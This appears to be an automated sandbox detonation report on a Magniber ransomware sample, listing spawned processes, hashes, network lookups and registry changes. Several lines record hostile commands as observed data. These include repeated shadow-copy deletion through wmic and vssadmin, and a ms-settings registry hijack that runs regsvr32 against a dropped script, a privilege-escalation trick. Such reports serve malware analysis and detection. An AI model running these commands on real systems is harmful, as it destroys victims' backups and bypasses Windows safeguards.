PID 2860 wrote to memory of 1620 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2860 wrote to memory of 1620 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1112 wrote to memory of 2908 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1112 wrote to memory of 2908 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1112 wrote to memory of 2908 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1112 wrote to memory of 2332 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1112 wrote to memory of 2332 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1112 wrote to memory of 2332 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\c752934305e1b89f82798ea2c26f70b3_JaffaCakes118.dll,#1

C:\Windows\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://f498ace85800dc40daditeiyb.topsaid.site/diteiyb^&2^&38246732^&93^&405^&12"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://f498ace85800dc40daditeiyb.topsaid.site/diteiyb&2&38246732&93&405&12

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2664 CREDAT:275457 /prefetch:2

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 f498ace85800dc40daditeiyb.topsaid.site udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2568-9-0x00000000020D0000-0x00000000020D1000-memory.dmp

memory/2568-11-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2568-10-0x00000000020E0000-0x00000000020E1000-memory.dmp

memory/2568-8-0x00000000020C0000-0x00000000020C1000-memory.dmp

memory/2568-7-0x00000000003B0000-0x00000000003B1000-memory.dmp

memory/2568-6-0x00000000002F0000-0x00000000002F1000-memory.dmp

memory/2568-5-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/2568-4-0x00000000002D0000-0x00000000002D1000-memory.dmp

memory/2568-3-0x00000000001C0000-0x00000000001C1000-memory.dmp

memory/2568-2-0x00000000001B0000-0x00000000001B1000-memory.dmp

memory/2568-1-0x00000000001A0000-0x00000000001A1000-memory.dmp

memory/2568-0-0x0000000001E20000-0x00000000020B1000-memory.dmp

memory/1112-12-0x00000000001E0000-0x00000000001E5000-memory.dmp

C:\Users\Admin\Pictures\readme.txt

MD5 cf6c0897802ebdb0a67c2fa5a478a570
SHA1 76a1374865972151672cc8be0bcb84d290a204bf
SHA256 1c706f882543ab94da63b6181500d7d8296ab241df4aca9a3c0750a9fe30f8aa
SHA512 c197446faa6005bb2bba2f5382703e408715d4b0929ccf93ea26f9716b9a21edb184c2353e0676b8c2bb87fba4c980499826195e6ed6b8ba7e398c1e05926a22

memory/2216-327-0x00000000020B0000-0x00000000021B0000-memory.dmp

memory/2216-328-0x00000000020B0000-0x00000000021B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab17A.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar258.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 01ffb49e06d9cbde4d5c9af0948b7689
SHA1 105c12630b30d75c0874557598e1b513d8e86ebc
SHA256 bd7b4f644caa2eae594ce42cfad8acaa31a1109fd0b3e2d1049ab0a158da470d
SHA512 20990b75618446c6b446067328b95a8aa677365fe852aed142fe43198f4a3335c9e34d03df967d8372bab1e06976b59d7d883993be81647ffd866969b57e36a9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ea2dad8a36a8b612868a412b1159e62
SHA1 3fc30aab213fd8c61fcc8eb158910e48ecba528a
SHA256 4ba2487d421bfc1259fd2c66bb8fd9193700a2668f616b06c0cc790edeb2ede6
SHA512 2cd82c73eaa50d9c8caa02238fc2a2a180d46262fa6602f11ab9fed49fe3168c66e783d198c2cbcce49f3306e30745efd2e634ec71f865bfa9557bf683a049e8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ec3238d42140ce86ca272dc58cb57f3
SHA1 69c2473bb4dca1edc97ebeb2b5b2e5cea40c94a5
SHA256 6419ebd6a80c656b5fa2a01323338a9ed86d74f6fa6cf6c56e577b72f9f55c32
SHA512 b62d16af38097c7ab6f99fed1f1d3b1892e0f47ff183de8cb54dc81d9918be65e0d734faedd53a2ef9e7946f411a6d76d19414a6ecbd2985bb7d94584ed13282

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1c88b24a1cc2c4bd187c27e9ed1d90d6
SHA1 5db5cdeabf6fcde26fe942b93c460cb001d461db
SHA256 d6e93a68ecdaad4377378f01b0ae41415d845442d2cca24173fb7cfcf5ed2e79
SHA512 526533cec09d36b45058bc3683cb9ff6fab9115f9492b46644778998b85cd2cd466e5af0eb0d7fe8c53fe8eb5e989502d592c2aec0c551692b91591840b6b008

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 60b261c401e4285b6d9bbe0e946028e1
SHA1 8320f63ac7a6869fb0ee953b8c0d376f27c80255
SHA256 7510f90d2c692f3e69293a73731be12437c8ccad0d1467102682d48ebe2b5090
SHA512 1dc7b3fda0937e8ea8d5c88b978bf9ebbff766acc71bd4e5010d113e8deeec8fb310ad6c42cee1c9160c828d7aa09b0365717909b7151560c50daf36bbae6173

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8957ca7dc380e31dca817171e11ad422
SHA1 1f16c5eac4d922d8e71fa9adc7131c0190816a9c
SHA256 fac92382cf3640ad0720e766da26ab125b7f822a6efe1fe7823f67c716cdea4b
SHA512 d87296ea41ab6e2dcfcb77ba97944dd6f9082ba2a3f839c9afee0268d3d595d1b181de314f42264031d9157bc63f1425e7d244cadd4a0fc5a1ba0a6b694c868d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ef06d3d9f73df2ef99b2b62c46d23324
SHA1 3179b1ef268e698f133f9c0ea6a0d98af00ed36d
SHA256 0d227c164ce65f59cf6207168d67577e46b98f59b1ae6a62167b718dcf5e2240
SHA512 60fd7c57676876d1726881393906b0cc71798b7955ebf04e64685720b8057a94b7f7297c1e5be00af208c658a1b9dbc961d6d36511b412924f4a652b9118438c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 27d56cb878bcb14add600eb1bdf9d2ff
SHA1 ab64e689f2f21bfcbafe1a56d4cc6814ff9d69dd
SHA256 48b912b2995ce33eaf80df2b6912d654a47be8387afb36bd5f4896145309f30a
SHA512 1fc0b3a73a23cd0c830ba71c00b2ea931028fe14e918c2ab091f4366146929d1966a7d0e4e8e84be9697ebe7f1b91f78eb327d9a96404d38738d4dcf47a8bec9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 454faccd17bf24bd0010565dcc7be13a
SHA1 a3ca6a3c7b6339eabbed221d12756361fbc0be46
SHA256 8d7972fa1995fba5291876bed57063b010b130fef6c9ff9c9fcdf800531c819b
SHA512 9da6c2210bacf732498f2bc1ac5203b90a0fe014a5e93a8c9498f74292dc1b3f7e0647ef93c359d622a88a159688c787395305d1bd15355b81e6090f6a37e06b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 616500c067bb434d6ec4b5765501d955
SHA1 ff930e69454f4029f990ae439bb821333f7a0aba
SHA256 bdd4b3afa2f2d27166398ffa04713872eb2662b5379a7e0bd9c83e45e9eb9c0e
SHA512 4a80f11b4a07a7965eadcf5777adf85614e629ca3d8cfbce8855226c1f65dfde585a2bdf4215c577e0ea8b570c26441d8aa2b4b9b34ad30dc5127d2ffbac526f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 39b29b600153b22dbfcfc756b9881ff3
SHA1 936da847998a92a853ff413568db831ffd47753d
SHA256 b74c92409f7cf2c8c1301b96fcaff8069536108e8e259f169fb6bc2914992a22
SHA512 1978ab6bd9c0b17c0bfad41146e32c96a08cc3b693e925a26b70851f36fd12c331863db3819761f8b3fd1243b39eab3ad0276699c99305f098b767e8e1d0edaf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0c313607a3dc9ee6a72010389474aedb
SHA1 6808d53bd9fe2817a7e96fc99575aadb8bf5baef
SHA256 848bc2864c38c0a9d68eb8294d1d0cf57c797d32990ba1dbe8121e11fd8bd9f3
SHA512 3cee1d23aed0c2d54fdcb87eebbcf16c84cce169991b2af6aea8e2297841a163e0ec60ff0fcb02231da840cc6548ae5da810349db11f0039071b13e0126cab73

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 278343698724c2bc83aa1b47df0a4afa
SHA1 0b96ccec932a0479ec8b2534913e8c3cc6a9f994
SHA256 b93f4ae736b953147f63796dcdda63c9c8f14d97690c4ce5bb0bab2bc7fa4305
SHA512 5a47316fb486dd377ad02e4d069ba4a06827eb578d95e91f1dcb7f4104103c09e9191ab90d8fd3f78228edf3b362e299e4125628e01b1b8918e2f16bef86d567

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5a196faa146a87bc68cb41f64afb4658
SHA1 1290a17cfef6b0595cd19006c159eff15d937dd1
SHA256 285fb93409e83dc2339fb9547ff578f75b3a62329c24cc94678ea19a2569480c
SHA512 2f416a54a5bda3f8c28539b3d69feb740755da1ecd504ebb2f5f64ca6f3846dfd05bc792ddc4b71392f779aead9b433b4a5f92bed9274ccdf415b1f9e0970859

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 798b232265c15fad76b5e1bf7376a880
SHA1 f3e573016ba9876b1051bcf405476922b7751452
SHA256 30537779df1c7c9066a3bb39e6ff859b150fa0b29438292236a3c039ae2ce75d
SHA512 899078c3c511675e9155e8cd3fa70a6006fbaca3190553b02078732d0fdfc658b2ed0ffd8151431d9b7ab582a65c64f5b7f23ed0d8778abd04734109cd8ada59

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0d0737c7814266fa64e86e618fdc3871
SHA1 3670e1c2dfb36a95ba638df2b4c3b6fc8c56a922
SHA256 cc4d6fc7a91bbeb172c6a168f47e86daf4f255cbb2da1bf900387c09632a01a2
SHA512 0b87bebccd414419ca251fe55cedac0b96b23c2644698a5c7c1702e63aa7ad2fd4fcd638f0b79ae001f0d9061d964ba1966f4b555a73860f61a9bb76f6f2bc44

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 14265faa6c0b165b8e201d5129dc20f7
SHA1 e5ae4c366d3e1b5225f260b8d67ddeb18c4f8a68
SHA256 c9c80d323b3d78afc7e237a2d84474b5304509bfef6043563b03a934e950435f
SHA512 1e93a885553e16d44165651af8452fe3965d5892e6c6dd1f4318cd62efaeb03016e7a977a31c1daf4646dd04e31ca6880409b0e6f6328b30507705f09de65ba7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 95fc4f6823b883525efd4f5fd89cce0a
SHA1 2445ff79beb4ec49507ee552029433d3f9729bb8
SHA256 07de3613817d3b232c4cfbf113cfb3bee99e895d450fbc8d6a8ca48c0a4e604c
SHA512 4e868571dc618936f85ca75386b6fe583f05c03855960e3b9e170a1605efc0ea83e1efd4383ebcdc53f702ebb0db19b206fd473654bc72ff3496a45a0a997d74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f32323fae3c2898741d9ebc154bcff1d
SHA1 db68328a1b1cc1c3eae4d9b5845c69f56768f65f
SHA256 48944175f8d83cfe59ef0abadbcca9999b37859ae77cc9ad1b448c4b553659fe
SHA512 a7540eae79126b71a39a3fa81976d984ef2f7cb92439085c47d08e2500194ad3b77964d37579743f591bd8c1cfaef1e68ae340385f51fc32f5cabb0ee7faf7ad

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-05 10:45

Reported

2024-12-05 10:47

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

sihost.exe

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (72) files with added filename extension

ransomware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2196 set thread context of 2868 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\sihost.exe
PID 2196 set thread context of 2924 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 2196 set thread context of 2068 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhostw.exe
PID 2196 set thread context of 3408 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 2196 set thread context of 3544 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 2196 set thread context of 3740 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe
PID 2196 set thread context of 3832 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
PID 2196 set thread context of 3896 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 2196 set thread context of 3988 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
PID 2196 set thread context of 4172 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 2196 set thread context of 3844 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
PID 2196 set thread context of 3696 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 2196 set thread context of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\backgroundTaskHost.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\Explorer.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\taskhostw.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\DllHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
